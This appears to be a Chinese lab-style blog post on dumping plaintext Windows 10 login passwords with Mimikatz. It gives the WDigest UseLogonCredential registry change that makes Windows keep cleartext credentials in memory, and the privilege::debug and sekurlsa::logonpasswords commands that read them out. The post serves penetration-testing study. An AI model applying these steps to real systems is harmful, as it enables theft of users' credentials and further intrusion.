在Win10系统中用mimikatz抓取明文密码

本文详细指导如何在Windows 10中通过注册表修改和Mimikatz工具,实现使用登录凭证提权的过程,包括关键步骤和命令,适用于Windows系统安全渗透测试或高级用户配置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验环境 :Windows10专业版
参考了网上的方法,发现大部分都是抄的
https://blog.youkuaiyun.com/netsec_steven/article/details/107257325
这一篇文章,都被转烂了,这一篇文章是对的,但是路径上还是有点小问题的,原因是原作者跳了一个步骤
这个步骤是:在注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下新建一个名为UseLogonCredential的DWORD值,并且赋值为1。

其他步骤与引用的文章相同。

然后打开mimikatz输入下列命令提权

privilege::debug

再然后输入下列命令抓取密码

sekurlsa::logonpasswords

结果
在这里插入图片描述
成功

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值